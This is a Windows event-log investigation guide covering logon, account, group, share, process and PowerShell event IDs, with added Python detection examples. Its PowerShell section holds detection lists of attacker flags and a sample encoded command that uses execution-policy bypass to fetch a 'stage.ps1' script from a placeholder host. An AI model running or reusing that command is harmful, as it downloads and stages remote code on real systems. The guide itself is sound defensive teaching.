Windows Event Investigation - Big

The document provides an in-depth overview of Windows Event Logging, detailing the types of events logged, their significance, and how they can be utilized for security and incident response. It outlines various event IDs related to account management, logon activities, process tracking, and PowerShell usage, emphasizing the importance of proper logging configurations for effective monitoring. Additionally, it discusses potential security threats and methods for detecting suspicious activities within Windows environments.

Uploaded by

abhiramithombra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
23 views13 pages

Windows Event Investigation - Big

The document provides an in-depth overview of Windows Event Logging, detailing the types of events logged, their significance, and how they can be utilized for security and incident response. It outlines various event IDs related to account management, logon activities, process tracking, and PowerShell usage, emphasizing the importance of proper logging configurations for effective monitoring. Additionally, it discusses potential security threats and methods for detecting suspicious activities within Windows environments.

Uploaded by

abhiramithombra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

Windows Event Investigation

By Ibrahim Saleh

Windows Event

Modern Windows systems can log vast amounts of information with minimal system impact. With the corresponding decrease in the price of storage media, excuses not to enable and retain these critical pieces of evidence simply don't stand up to scrutiny. Configuring adequate logging on Windows systems, and ideally aggregating those logs into a SIEM or other log aggregator, is a critical step toward ensuring that your environment is able to support an effective incident response.

Windows event logs are stored in the %SystemRoot%\System32\winevt\logs directory by default, in the binary XML Windows Event Logging format, designated by the .evtx extension. Logs can also be stored remotely using log subscriptions.

Events have several fields:

1. Log name: the name of the Event Log where the event is stored.
2. Source: the component that generated the event, such as a Microsoft component, an application, …
3. Event ID: a code assigned to each event type that tells you what the event is.
4. Login ID: a unique number for every logon session, used to trace a user's activity from logon until logoff.
5. User: the user context that the source was running as when it logged the event. Note that this field often indicates "System" or a user that is not the cause of the event being recorded.
6. Logged: the local timestamp.
7. Task category: assigned by the source that generated the event.
8. Description: a text block where additional information specific to the event being logged is recorded.

Windows Event Types

Windows events have several types, but there are three main types:
 Security Events: this log includes records of all user activity, such as logon, login validation, object access, account management, privilege use, and process tracking events.
 System Events: more important to system administrators for troubleshooting and diagnosing system problems, because it includes events such as system startup and shutdown and service status changes.
 Application Events: the application event log contains events logged by any application configured to store its logs in a Windows application log file. Such configurations are determined by the developers during application development. The application logs may contain events generated by applications such as antivirus software or a database.
 There are many other event types, such as PowerShell, RDP, WMI, and Scheduled Tasks.

Account management and login

Account Logon is the Microsoft term for authentication. Logon is the term used to refer to an account gaining access to a resource. Both Account Logon and Logon events are recorded in the Security event log. Account logon of domain accounts is performed by a domain controller within a Windows network. Account logon events are logged by the system that performs the authentication.
Windows accounts can be:
 Local Account
 Domain User Account
 Default Local System Accounts:
(1) System: the most powerful account; it has complete control over the system and can access all resources and objects.
(2) Network Service: limited privileges; used by specific Windows services and processes to authenticate over the network (allowed to present the computer's credentials to remote servers).
(3) Local Service: similar to the NETWORK SERVICE account, but it does not present credentials; it uses a null session for remote access.
(4) <Computer Name>$: created when a Windows computer is joined to a domain. It is used to authenticate the computer to the domain, allowing the computer to access domain resources such as shared folders, printers, and other network resources, and allowing administrators to manage the computer's settings and configuration centrally.
(5) Anonymous Logon: this account is used for null session communications, i.e. network communications without the need to provide explicit credentials. This account can be used to enumerate account information, security policy, registry data, and network shares.

Security Windows Event Types:
1) Logon Success:
a) Event ID: 4624
b) Subject: details of the account that requested the logon, not the user who logged on. For Event ID 4624, the values of the Subject section are usually empty and not useful.
c) Logon Type: describes the way the logon was performed: logon type (2) for interactive logon (using the keyboard), logon type (3) for remote logon, logon type (9) for RDP logon.
d) New Logon: the user who logged on to the system.
e) Process Information: this section includes information about the Windows process that initiated the logon activity.
f) Network Information: details of who connected to this machine remotely. If the user logged on to this PC locally, this field is empty. Useful for lateral movement (LTM) analysis.

2) Administrative Logon: special privileges
a) Event ID: 4672
b) Contains information about the account with administrative privileges and about the administrative privileges that the account has.
c) Note: when an admin account logs on, two events are generated (4624 for logon success, 4672 for admin logon).

3) Logon Failed:
a) Event ID: 4625
b) Contains two important fields:
 Status: indicates the overall result of the logon attempt; you can take this hex value and look it up to learn what it means.
 Sub-Status: provides more detailed information about the reason for the logon failure. It gives additional context to the "Status" field.
 When you see a lot of logon failures, keep in mind that this may be a brute force attack or password spraying; you can determine which one by looking at the status and sub-status.
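The triage described above, as an added example that is not part of the original document: it groups Event ID 4625 records by source address, separates a brute force pattern (one source, few accounts) from password spraying (one source, many accounts), and translates the Status / Sub-Status codes. The records are constructed sample data with the real 4625 field names (TargetUserName, IpAddress, Status, SubStatus); the NTSTATUS table holds well-known values, and the distinct-account threshold used to separate the two patterns is an assumption to tune for your environment.

```python
# Added example (not from the original document): classify a burst of
# Event ID 4625 logon failures as brute force or password spraying and
# explain the Status / Sub-Status codes. Records are constructed samples.
from collections import Counter, defaultdict

# Well-known NTSTATUS values seen in the 4625 Status / Sub-Status fields.
NTSTATUS = {
    "0xC000006D": "STATUS_LOGON_FAILURE (bad user name or password)",
    "0xC000006A": "STATUS_WRONG_PASSWORD (user exists, wrong password)",
    "0xC0000064": "STATUS_NO_SUCH_USER (user name does not exist)",
    "0xC0000234": "STATUS_ACCOUNT_LOCKED_OUT",
    "0xC0000072": "STATUS_ACCOUNT_DISABLED",
}

# Constructed 4625 records: 10.0.0.5 hammers one account (brute force),
# 10.0.0.9 tries one guess against many accounts (password spraying).
SAMPLE_4625 = (
    [{"TargetUserName": "jdoe", "IpAddress": "10.0.0.5",
      "Status": "0xC000006D", "SubStatus": "0xC000006A"}] * 12
    + [{"TargetUserName": f"user{i:02d}", "IpAddress": "10.0.0.9",
        "Status": "0xC000006D", "SubStatus": "0xC000006A"} for i in range(15)]
    + [{"TargetUserName": "ghost", "IpAddress": "10.0.0.9",
        "Status": "0xC000006D", "SubStatus": "0xC0000064"}]
)


def describe(code):
    """Translate a Status / Sub-Status hex code into its NTSTATUS meaning."""
    code = "0x" + code[2:].upper()          # normalise 0xc000006a -> 0xC000006A
    return NTSTATUS.get(code, "unknown status " + code)


def classify_failures(events, threshold=10):
    """Group 4625 events by source IP and label the failure pattern.

    brute force      : many failures from one source against few accounts
    password spraying: many failures from one source across many accounts
    Sources with fewer than `threshold` failures are ignored.
    """
    per_source = defaultdict(list)
    for ev in events:
        per_source[ev["IpAddress"]].append(ev)

    verdicts = {}
    for ip, evs in per_source.items():
        if len(evs) < threshold:
            continue
        accounts = {e["TargetUserName"] for e in evs}
        # Assumed heuristic: spraying touches at least threshold/2 distinct accounts.
        kind = "password spraying" if len(accounts) >= threshold // 2 else "brute force"
        substatus = Counter(e["SubStatus"] for e in evs)
        verdicts[ip] = {
            "kind": kind,
            "failures": len(evs),
            "accounts": len(accounts),
            "substatus": {describe(c): n for c, n in substatus.items()},
        }
    return verdicts


if __name__ == "__main__":
    for ip, v in classify_failures(SAMPLE_4625).items():
        print(ip, v["kind"], v["failures"], "failures across", v["accounts"], "accounts")
        for meaning, n in v["substatus"].items():
            print("   ", n, "x", meaning)
```

A sub-status of STATUS_NO_SUCH_USER mixed into a spray (the "ghost" record above) is worth reporting separately: it shows the source is guessing user names, not only passwords.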

4) Tracking Session: using the login ID we can trace all of a user's activity and determine the length of a session.
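Session tracking by login ID, as an added example that is not part of the original document: it parses events in the XML form Event Viewer and wevtutil export (the standard event schema namespace is assumed), keys every record on its logon ID, and reports each session's user, start, end and length. A 4624 event carries the new session's ID in TargetLogonId, while 4672 and 4688 carry it in SubjectLogonId; the logoff event 4634 is not listed in the document and is included here because it closes the session. The events below are constructed samples.

```python
# Added example (not from the original document): rebuild logon sessions
# from exported event XML by correlating records on their Logon ID.
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample export: one interactive session for jdoe (logon 4624,
# admin privileges 4672, a process 4688, logoff 4634) plus an unrelated 4688.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4624</EventID><TimeCreated SystemTime="2024-03-01T08:00:00.0000000Z"/><Computer>WS01</Computer></System>
 <EventData><Data Name="TargetUserName">jdoe</Data><Data Name="TargetLogonId">0x3e7a1</Data><Data Name="LogonType">2</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4672</EventID><TimeCreated SystemTime="2024-03-01T08:00:01.0000000Z"/><Computer>WS01</Computer></System>
 <EventData><Data Name="SubjectUserName">jdoe</Data><Data Name="SubjectLogonId">0x3e7a1</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4688</EventID><TimeCreated SystemTime="2024-03-01T08:15:30.0000000Z"/><Computer>WS01</Computer></System>
 <EventData><Data Name="SubjectLogonId">0x3e7a1</Data><Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4634</EventID><TimeCreated SystemTime="2024-03-01T09:30:00.0000000Z"/><Computer>WS01</Computer></System>
 <EventData><Data Name="TargetLogonId">0x3e7a1</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4688</EventID><TimeCreated SystemTime="2024-03-01T08:20:00.0000000Z"/><Computer>WS01</Computer></System>
 <EventData><Data Name="SubjectLogonId">0x3e7</Data><Data Name="NewProcessName">C:\Windows\System32\svchost.exe</Data></EventData>
</Event>
</Events>"""


def parse_time(ts):
    """SystemTime has seven fractional digits; drop the fraction and the Z."""
    return datetime.fromisoformat(ts.split(".")[0].rstrip("Z"))


def parse_events(xml_text):
    """Turn exported event XML into flat dicts: System fields plus every EventData item."""
    root = ET.fromstring(xml_text)
    records = []
    for ev in root.findall("e:Event", NS):
        rec = {
            "EventID": int(ev.find("e:System/e:EventID", NS).text),
            "Time": parse_time(ev.find("e:System/e:TimeCreated", NS).get("SystemTime")),
            "Computer": ev.find("e:System/e:Computer", NS).text,
        }
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text
        records.append(rec)
    return records


def logon_id_of(rec):
    """4624/4634 name the session in TargetLogonId; activity events use SubjectLogonId."""
    return rec.get("TargetLogonId") if rec["EventID"] in (4624, 4634) else rec.get("SubjectLogonId")


def build_sessions(records):
    """Group records by Logon ID in time order; start is the 4624, end is the last record."""
    sessions = {}
    for rec in sorted(records, key=lambda r: r["Time"]):
        lid = logon_id_of(rec)
        if lid is None:
            continue
        s = sessions.setdefault(lid, {"user": None, "start": None, "end": None, "events": []})
        s["events"].append((rec["Time"], rec["EventID"]))
        if rec["EventID"] == 4624:
            s["user"] = rec.get("TargetUserName")
            s["start"] = rec["Time"]
        s["end"] = rec["Time"]
    return sessions


def session_length(session):
    """Length of a session, or None when its 4624 was not captured."""
    return None if session["start"] is None else session["end"] - session["start"]


if __name__ == "__main__":
    for lid, s in build_sessions(parse_events(SAMPLE_XML)).items():
        print(lid, s["user"], session_length(s), [eid for _, eid in s["events"]])
```

A session whose 4624 is missing (the 0x3e7 record above) gets no length; in practice that means the log was rotated or the logon happened before collection started, which is itself worth noting in a timeline.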

5) Account Management: Windows creates events when an account is created, deleted, disabled, enabled or modified. These are the common Account Management event IDs:
a) Create User Account: 4720
b) User Account Enabled: 4722
c) Delete User Account: 4726
d) Disable User Account: 4725
Note: use the previous events to detect persistence in a compromised environment through the creation of new accounts; an attacker may create a new account and add it to a high-privilege group.

6) Group Management: Windows creates events when a group is created, modified or deleted, and when a user is added to or removed from a group. These are the common Group Management event IDs:
a) Create Local Group: 4731
b) Delete Local Group: 4734
c) Create Global Group: 4727
d) Delete Global Group: 4730
e) Add User to Local Group: 4732
f) Remove User from Local Group: 4733
g) Add User to Global Group: 4728
h) Remove User from Global Group: 4729
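The persistence pattern from the Account Management note (a new account that is promptly added to a high-privilege group), detected with the Group Management events above, as an added example that is not part of the original document. It correlates 4720 with 4728 / 4732 on the account SID (4720 reports it as TargetSid, the membership events as MemberSid); the group names treated as privileged and the one-hour window are assumptions, and all records are constructed sample data.

```python
# Added example (not from the original document): flag accounts that are
# added to a privileged group shortly after being created.
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"administrators", "domain admins", "enterprise admins"}  # assumed list
ADD_MEMBER_EVENTS = {4728: "global group", 4732: "local group"}

# Constructed sample events (times are local, ISO format).
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2024-03-01T10:00:00", "SubjectUserName": "svc-backup",
     "TargetUserName": "helpdesk2", "TargetSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4722, "Time": "2024-03-01T10:00:05", "SubjectUserName": "svc-backup",
     "TargetUserName": "helpdesk2", "TargetSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4732, "Time": "2024-03-01T10:00:20", "SubjectUserName": "svc-backup",
     "MemberSid": "S-1-5-21-1111-2222-3333-1105", "TargetUserName": "Administrators"},
    # Routine onboarding: new account added to a non-privileged group.
    {"EventID": 4720, "Time": "2024-03-01T11:00:00", "SubjectUserName": "hr.admin",
     "TargetUserName": "newhire", "TargetSid": "S-1-5-21-1111-2222-3333-1106"},
    {"EventID": 4728, "Time": "2024-03-01T11:02:00", "SubjectUserName": "hr.admin",
     "MemberSid": "S-1-5-21-1111-2222-3333-1106", "TargetUserName": "Sales"},
    # Account promoted a day after creation: outside the correlation window.
    {"EventID": 4720, "Time": "2024-02-28T09:00:00", "SubjectUserName": "hr.admin",
     "TargetUserName": "contractor", "TargetSid": "S-1-5-21-1111-2222-3333-1107"},
    {"EventID": 4732, "Time": "2024-03-01T09:00:00", "SubjectUserName": "it.admin",
     "MemberSid": "S-1-5-21-1111-2222-3333-1107", "TargetUserName": "Administrators"},
]


def _t(s):
    return datetime.fromisoformat(s)


def find_persistence(events, window=timedelta(hours=1)):
    """Return one alert per account added to a privileged group within `window` of its 4720."""
    created = {}   # SID -> the 4720 record that created it
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] in ADD_MEMBER_EVENTS:
            group = ev["TargetUserName"]            # in 4728/4732 the group is the target
            origin = created.get(ev.get("MemberSid"))
            if origin is None or group.lower() not in PRIVILEGED_GROUPS:
                continue
            delay = _t(ev["Time"]) - _t(origin["Time"])
            if timedelta(0) <= delay <= window:
                alerts.append({
                    "account": origin["TargetUserName"],
                    "group": group,
                    "group_kind": ADD_MEMBER_EVENTS[ev["EventID"]],
                    "created_by": origin["SubjectUserName"],
                    "added_by": ev["SubjectUserName"],
                    "seconds_after_creation": int(delay.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for a in find_persistence(SAMPLE_EVENTS):
        print(f"{a['account']} added to {a['group']} ({a['group_kind']}) "
              f"{a['seconds_after_creation']}s after creation by {a['created_by']}")
```

Matching on the SID rather than the account name avoids missing the case where the account is renamed between creation and promotion; the creating and adding subjects are reported together because the same non-administrative subject doing both is the tell in the sample.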

7) Account Validation: the DC or the local system (SAM) validates credentials via NTLM or Kerberos; these events relate to the authentication protocols.
For domain account authentications, the domain controller serves as the authentication server and logs the login validation events.
Related Event IDs:
a) Records both successful and failed attempts when the NTLM protocol is used: 4776
b) Successful TGT request: 4768
c) Successful service ticket request: 4769
d) Pre-authentication failure, meaning the DC failed to validate the provided credentials, so the DC won't grant a TGT or Ticket Granting Service (TGS) tickets: 4771

Network Shared Object

A shared object refers to a shared folder or network share. This is a directory or storage location on a computer that is shared with other users over a network. Users with the appropriate permissions can access and interact with the contents of the shared folder.

Attackers frequently leverage valid credentials to remotely access data through user-created or administrative shares.

Doing so will generate Account Logon events as mentioned above, but additional logging can also be generated by enabling it in the Group Policy Management Console by navigating to Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> Object Access -> Audit File Share. Once enabled, the following Event IDs will be logged in the Security Log:
o Event ID (5140): a network share object was accessed, but this event does not show which file was accessed. So, a large number of these events means there is something suspicious.
o Event ID (5142): a network share object was added.
o Event ID (5143): a network share object was modified.
o Event ID (5144): a network share object was deleted.
o Event ID (5145): a network share object was checked to see whether the client can be granted the desired access. Failure is only logged if the permission is denied at the file share level. If permission is denied at the NTFS level, no entry is recorded.
Attackers use shared objects to steal sensitive data or inject malicious code. So, ensure that access controls and permissions are in place.

Windows Process and Related Events

Windows processes are programs running in the background, carrying out Windows operations and program or application execution on a Windows operating system.
Each process has its own memory space and resources.
Each process has many attributes, such as name, ID, path, command line and parent process.

Windows has many process types; we can explain a few of them:
i) System:
o Definition: a kernel-mode process
o Process Name: System
o Process Path: N/A
o Username: System
o Parent Process: N/A
ii) Windows initialization (wininit.exe):
o Definition: the process that represents session 0 and is responsible for initializing the Service Control Manager (services.exe) and the Local Security Authority process (lsass.exe).
o Process Name: wininit.exe
o Process Path: %Systemroot%\System32\wininit.exe
o Username: SYSTEM
o Parent Process: N/A (created by an smss.exe instance, but it does not appear as a parent process in any analysis tool)

iii) Service Host (svchost.exe):
o Definition: runs and hosts service DLLs. There are multiple instances of svchost.exe, and each instance uses a unique "-k" parameter in its command line.
o Process Name: svchost.exe
o Process Path: %Systemroot%\System32\svchost.exe
o Username: SYSTEM, LOCAL SERVICE, or NETWORK SERVICE
o Parent Process: services.exe
There are a lot of processes; you can read more in this article.

Windows process activity is logged in two events:

1) Event ID (4688):
o Records every process creation activity and its attributes; contains very useful information about the username, process name, process path, and parent process.
o Creator Subject field: information about the user and login session that initiated the newly created process. The Creator Subject is also the owner of the parent process that created the new process.
o Target Subject field: this section provides information about the user who owns the newly created process and in whose context the process runs, as well as the login session associated with the process.
o Process Information field: contains the new process ID, new process name, token elevation type, mandatory label, creator process ID, creator process name, and process command line.

Note: Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.

2) Event ID (4689):
o Records every process exit activity and its attributes.
o Contains Subject and Process Information.
o We can link 4688 and 4689 to build a full view of the process lifetime.

Now, how to detect a suspicious process:
I. Most attackers hide a malicious process under a name similar to a Windows process name, so check whether the name is correct or not.
II. LOTL tools (Living off the land): attackers depend on legitimate software and binaries that are already available, like Powershell.exe, cmd.exe, reg.exe and Rundll32.exe, so check the command line and behavior of the process.
III. Suspicious parent-child process: attackers use a legitimate process but with a suspicious parent process; with your knowledge of processes you can detect a process with a suspicious parent.
IV. Suspicious process path: with your knowledge of processes you know what the normal path of each process is, so you can detect this.
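The four checks above applied to Event ID 4688 records, as an added example that is not part of the original document. The baseline of expected paths and parents is built from the process descriptions in this document (wininit.exe, services.exe, lsass.exe, svchost.exe under System32, which is an assumption about %Systemroot%), the LOLBin list is the one in check II, and the suspicious command-line fragments come from the PowerShell section. The 4688 records are constructed sample data using the real field names NewProcessName, ParentProcessName and CommandLine; the name-similarity cut-off is an assumed value.

```python
# Added example (not from the original document): run the four suspicious
# process checks (lookalike name, LOLBin command line, parent, path) over
# constructed Event ID 4688 records.
from difflib import SequenceMatcher

# name -> (expected lower-case path, expected parent names; empty set = not checked)
BASELINE = {
    "wininit.exe":  (r"c:\windows\system32\wininit.exe",  set()),   # parent not visible
    "services.exe": (r"c:\windows\system32\services.exe", {"wininit.exe"}),
    "lsass.exe":    (r"c:\windows\system32\lsass.exe",    {"wininit.exe"}),
    "svchost.exe":  (r"c:\windows\system32\svchost.exe",  {"services.exe"}),
}
LOLBINS = {"powershell.exe", "cmd.exe", "reg.exe", "rundll32.exe"}
SUSPICIOUS_ARGS = ["-encodedcommand", "-enc ", "-e ", "-executionpolicy", "-ep ",
                   "downloadfile", "invoke-webrequest", "invoke-command", "enter-pssession"]
LOOKALIKE_RATIO = 0.85   # assumed cut-off for "name resembles a system binary"

# Constructed 4688 records: a lookalike, a misplaced svchost, a LOLBin, a benign one.
SAMPLE_4688 = [
    {"SubjectUserName": "jdoe", "NewProcessName": r"C:\Users\jdoe\AppData\Local\Temp\svch0st.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "svch0st.exe"},
    {"SubjectUserName": "jdoe", "NewProcessName": r"C:\Users\jdoe\Downloads\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -ep bypass -enc BASE64PLACEHOLDER"},
    {"SubjectUserName": "SYSTEM", "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def check_process(rec):
    """Return the list of findings for one 4688 record; an empty list means nothing odd."""
    findings = []
    path = rec["NewProcessName"].lower()
    name = _basename(path)
    parent = _basename(rec.get("ParentProcessName", ""))
    cmd = rec.get("CommandLine", "").lower()

    if name not in BASELINE:
        # I. masquerading: unknown name that closely resembles a system binary
        for known in BASELINE:
            if SequenceMatcher(None, name, known).ratio() >= LOOKALIKE_RATIO:
                findings.append(f"name '{name}' resembles system binary '{known}'")
                break
    else:
        expected_path, expected_parents = BASELINE[name]
        # IV. path: a known name running from an unexpected location
        if path != expected_path:
            findings.append(f"'{name}' running from unexpected path {rec['NewProcessName']}")
        # III. parent-child: a known name started by an unexpected parent
        if expected_parents and parent not in expected_parents:
            findings.append(f"'{name}' spawned by unexpected parent '{parent}'")

    # II. LOLBins: legitimate tool, so judge it by its command line
    if name in LOLBINS:
        hits = [a.strip() for a in SUSPICIOUS_ARGS if a in cmd]
        if hits:
            findings.append(f"LOLBin '{name}' with suspicious arguments: {', '.join(hits)}")
    return findings


def scan(records):
    """Pair every record's process name with its findings."""
    return [(rec["NewProcessName"], check_process(rec)) for rec in records]


if __name__ == "__main__":
    for proc, findings in scan(SAMPLE_4688):
        print(proc, "->", findings or "ok")
```

The lookalike check deliberately runs only for names that are not in the baseline, and the path and parent checks only for names that are: "svch0st.exe" can never have a correct path, while a genuine "svchost.exe" in a Downloads folder is a path problem, not a spelling one.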

PowerShell Events

PowerShell is designed for system administrators; it is a very powerful tool that allows you to control and manage almost the entire system, with secure remote capabilities.
PowerShell extends its functionality through cmdlets (pronounced command-lets), which are collections of specific commands allowing PowerShell users to conduct specific tasks, such as connecting remotely to another system, displaying processes, and more.
Attackers use PowerShell because:
o It is installed and whitelisted by default on all Windows operating systems.
o It generates few digital artifacts.
o It provides remote access capabilities over an encrypted channel.
o A growing community exists with available PowerShell penetration scripts ready to use.
o Several attack and post-exploitation frameworks built on PowerShell exist and are available for everyone to use, such as Nishang, PowerSploit, Empire, and WinEnum.

PowerShell has two log files:
o Event ID (800): records any PowerShell command executions made through the PowerShell console. This logging type is enabled by default and generated by all PowerShell versions.
PSReadLine: a feature that saves every PowerShell command run on the machine, as history, in the file C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine.
Transcripts: a feature to track the input and output of PowerShell sessions. The Transcripts feature is not enabled by default.
o Event ID (4103) and (4104):
(i) Event ID (4103): logs the executed modules and cmdlets.
(ii) Event ID (4104): records the executed PowerShell script block contents on first execution.

PowerShell Attacks:
o Fileless PowerShell Malware: a type of malicious software that leverages PowerShell to carry out malicious activities without writing traditional malware files to the system's disk. Instead of relying on executable files stored on disk, fileless malware operates in memory, making it more challenging for traditional antivirus solutions to detect. You can detect this by reviewing Event ID 4104.
o Suspicious PowerShell commands: DownloadFile, -ExecutionPolicy or -ep, -EncodedCommand or -e or -enc, Invoke-Command, Enter-PSSession, Invoke-WebRequest
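Reviewing Event ID 4104 script block text for the indicators listed above, as an added example that is not part of the original document. The point it adds is that -EncodedCommand (-e / -enc) hides the real command behind base64 of UTF-16LE text, so a reviewer has to decode that argument and scan the result as well; an indicator such as Invoke-WebRequest is otherwise invisible. The script block is constructed sample data built inside the block; the indicator list is the document's, and the token-boundary matching (so that "-e" does not also match "-enc") is an implementation choice.

```python
# Added example (not from the original document): scan a 4104 script block
# for the document's suspicious PowerShell indicators, decoding any
# -EncodedCommand payload so the hidden command is scanned too.
import base64
import re

INDICATORS = ["DownloadFile", "-ExecutionPolicy", "-ep", "-EncodedCommand", "-e", "-enc",
              "Invoke-Command", "Enter-PSSession", "Invoke-WebRequest"]

# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?<![\w-])-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample: the inner command is wrapped the way -EncodedCommand expects it.
INNER_COMMAND = "Invoke-WebRequest -Uri http://files.example.invalid/stage.ps1"
SAMPLE_4104 = "powershell.exe -ep bypass -enc " + \
    base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode("ascii")
BENIGN_4104 = "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"


def _matches(indicator, text):
    """Match the indicator as a whole token so '-e' does not also fire on '-enc'."""
    return re.search(r"(?<![\w-])" + re.escape(indicator) + r"(?![\w-])", text, re.I) is not None


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; return the plain text."""
    return base64.b64decode(blob).decode("utf-16-le")


def scan_script_block(text):
    """Return the indicators found in the block and any decoded -EncodedCommand payloads."""
    hits = [i for i in INDICATORS if _matches(i, text)]
    decoded = []
    for m in ENCODED_FLAG.finditer(text):
        try:
            plain = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):   # not valid base64 / not UTF-16LE text
            continue
        decoded.append(plain)
        hits += [i for i in INDICATORS if i not in hits and _matches(i, plain)]
    return {"indicators": hits, "decoded": decoded}


if __name__ == "__main__":
    for block in (SAMPLE_4104, BENIGN_4104):
        result = scan_script_block(block)
        print(result["indicators"] or "clean")
        for plain in result["decoded"]:
            print("  decoded:", plain)
```

The same decoding applies to the command line recorded in Event ID 4688 and to the PSReadLine history file; in all three places the encoded form is what the attacker expects a reviewer to skim past.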
